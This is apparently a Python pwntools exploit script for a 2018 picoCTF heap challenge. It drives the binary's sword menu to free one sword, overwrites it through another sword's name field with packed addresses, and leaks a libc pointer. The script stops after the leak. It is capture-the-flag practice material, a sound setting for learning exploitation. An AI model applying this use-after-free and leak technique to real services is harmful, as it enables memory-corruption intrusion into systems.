  1. from pwn import *
  2. import struct
  3. import binascii
  4.  
# Make pwntools echo every byte sent and received; the author derived the
# reply offset used in equip() from this debug output.
context.log_level = 'debug'

# Fixed addresses for the challenge binary. NOTE(review): the paste does not
# say which symbols they refer to; the 0x40xxxx/0x60xxxx values look like
# non-PIE binary addresses, but confirm against the actual binary.
read = 0x602040
readoffset = 0x004007b0  # not referenced anywhere in the visible script
hoo = 0x400b9d

# Answer sent to every "weight of the sword?" prompt. Per the author, '-1'
# keeps the blademaster from getting angry, which saves a lot of time.
weight = '-1'
  10.  
  11. # forges a sword
def makeSword(p):
    """Forge a sword: wait for the menu (ends in 'Quit.') and pick option 1.

    Args:
        p: pwntools tube, or any object with ``recvuntil``/``sendline``.

    Returns:
        None; the menu text is discarded.
    """
    option = '1'
    p.recvuntil('Quit.')
    p.sendline(option)
    return None
  16.  
def freeSword(p, i):
    """Pick menu option 4 and answer the index prompt with *i*.

    The script's own comment calls option 4 "freeing" a sword; nothing else
    about the service's behaviour is assumed here.

    Args:
        p: pwntools tube, or any object with ``recvuntil``/``sendline``.
        i: sword index; converted with ``str()`` before sending.

    Returns:
        None.
    """
    dialogue = (
        ('Quit.', '4'),
        ('index of the sword?', str(i)),
    )
    for prompt, answer in dialogue:
        p.recvuntil(prompt)
        p.sendline(answer)
    return None
  23.  
def harden(p, i, len, string):
    """Pick menu option 5 ("harden") for sword *i* and fill in its prompts.

    Args:
        p: pwntools tube, or any object with ``recvuntil``/``sendline``.
        i: sword index; converted with ``str()`` before sending.
        len: value answered to the "sword name?" length prompt. The name
            shadows the ``len`` builtin but is kept because callers may pass
            it by keyword.
        string: sent verbatim as the new sword name.

    The "weight of the sword?" prompt is always answered with the
    module-level ``weight``.

    Returns:
        None.
    """
    p.recvuntil('Quit.')
    p.sendline('5')

    index_answer = str(i)
    p.recvuntil('index of the sword?')
    p.sendline(index_answer)

    length_answer = str(len)
    p.recvuntil('sword name?')
    p.sendline(length_answer)

    p.recvuntil('sword name.')
    p.sendline(string)

    # Module global; see the note next to its definition.
    p.recvuntil('weight of the sword?')
    p.sendline(weight)
    return None
  36.    
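def equip(p, i):
    """Pick menu option 6 ("equip") for sword *i* and parse the address it leaks.

    The service's reply to this option contains a libc pointer; the author
    located its bytes at offset 13 of the reply using pwntools' debug output.
    A user-space x86-64 pointer has 6 significant little-endian bytes, so
    ``result[13:19]`` is exactly that span.

    Args:
        p: pwntools tube, or any object with ``recvuntil``/``sendline``
            whose ``recvuntil`` returns the raw reply.
        i: sword index; converted with ``str()`` before sending.

    Returns:
        The leaked address as a ``hex()`` string, e.g. ``'0x7f...'``.

    Raises:
        ValueError: if the reply holds fewer than 6 bytes after offset 13.
    """
    p.recvuntil('Quit.')
    p.sendline('6')
    p.recvuntil('index of the sword?')
    p.sendline(str(i))
    result = p.recvuntil('so cooool!')

    raw = result[13:19]
    if len(raw) != 6:
        raise ValueError(
            'leak too short: got %d byte(s) after offset 13' % len(raw))

    # Zero-extend the 6 bytes to 8 and decode as an explicit little-endian
    # u64. The original used native 'L' (4 bytes on some platforms) with an
    # unbalanced quote in the format string, and then shadowed the builtin
    # hex() with a bytes object before calling it.
    (addr,) = struct.unpack('<Q', raw + b'\x00\x00')
    return hex(addr)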
  49.    
  50.  
# Connect to the 2018 picoCTF challenge service named in the paste.
p = remote('2018shell1.picoctf.com', 10491)

# Forge two swords, then run option 4 ("free") on index 0.
for _ in range(2):
    makeSword(p)
freeSword(p, 0)

# Name payload handed to harden() for index 1. Per the author's comment the
# leading 0x08 bytes take the spot of the name length (eight of them since
# two integers occupy 8 bytes), followed by the two packed addresses.
padding = '\x08' * 8
exploit1 = padding + struct.pack('L', read) + struct.pack('L', hoo)
harden(p, 1, 32, exploit1)

# Equipping index 0 makes the service print the pointer parsed by equip().
libcBase = equip(p, 0)